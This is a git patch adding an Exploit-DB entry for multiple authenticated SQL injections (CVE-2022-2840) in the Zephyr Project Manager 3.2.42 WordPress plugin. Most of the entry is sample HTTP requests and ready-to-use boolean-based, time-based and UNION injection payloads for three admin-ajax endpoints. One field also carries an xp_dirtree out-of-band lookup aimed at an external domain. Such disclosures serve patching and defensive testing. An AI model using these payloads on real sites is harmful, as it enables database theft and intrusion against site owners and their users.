From 4d6a64eb6bd39cb2ce182dc0eca03d69a490a6f2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 7 Oct 2022 05:01:49 +0000 Subject: [PATCH] DB: 2022-10-07 1 changes to exploits/shellcodes Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi --- exploits/php/webapps/51024.txt | 118 +++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 119 insertions(+) create mode 100644 exploits/php/webapps/51024.txt diff --git a/exploits/php/webapps/51024.txt b/exploits/php/webapps/51024.txt new file mode 100644 index 000000000..1a04ac9b0 --- /dev/null +++ b/exploits/php/webapps/51024.txt @@ -0,0 +1,118 @@ +# Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi +# Date: 14-08-2022 +# Exploit Author: Rizacan Tufan +# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated +# Software Link: https://wordpress.org/plugins/zephyr-project-manager/ +# Vendor Homepage: https://zephyr-one.com/ +# Version: 3.2.42 +# Tested on: Windows, Linux +# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c) + +# Description + +Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks. + +It has been determined that the data coming from the input field in most places throughout the application are used in=20 +the query without any sanitize and validation. + +The details of the discovery are given below. + +# Proof of Concept (PoC)=20 + +The details of the various SQL Injection on the application are given below. + +## Endpoint of Get Project Data. + +Sample Request :=20 + +POST /wp-admin/admin-ajax.php HTTP/2 +Host: vuln.local +Cookie: ... +... +Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects +Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 74 +Origin: https://vuln.local +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers + +action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7 + +Payload :=20 + +--- +Parameter: project_id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7 + + Type: time-based blind + Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP) + Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7 + + Type: UNION query + Title: Generic UNION query (NULL) - 20 columns + Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7 +--- + + +## Endpoint of Get Task Data. + +Sample Request :=20 + +POST /wp-admin/admin-ajax.php HTTP/2 +Host: vuln.local +Cookie: ... +... +Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks +Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 51 +Origin: https://vuln.local +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers + +task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 + +Payload :=20 + +--- +Parameter: task_id (POST) + Type: time-based blind + Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) + Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 +--- + +## Endpoint of New Task. + +Sample Request :=20 + +POST /wp-admin/admin-ajax.php HTTP/2 +Host: vuln.local +Cookie: ... +... +Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks +Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 337 +Origin: https://vuln.local +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers + +task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 + +Payload :=20 + +--- +Parameter: task_project (POST) + Type: time-based blind + Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) + Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 +--- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5bcd9fcac..952f95c0a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -45085,3 +45085,4 @@ id,file,description,date,author,type,platform,port 51021,exploits/php/webapps/51021.txt,"Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php, 51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php, 51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php, +51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",1970-01-01,"Rizacan Tufan",webapps,php,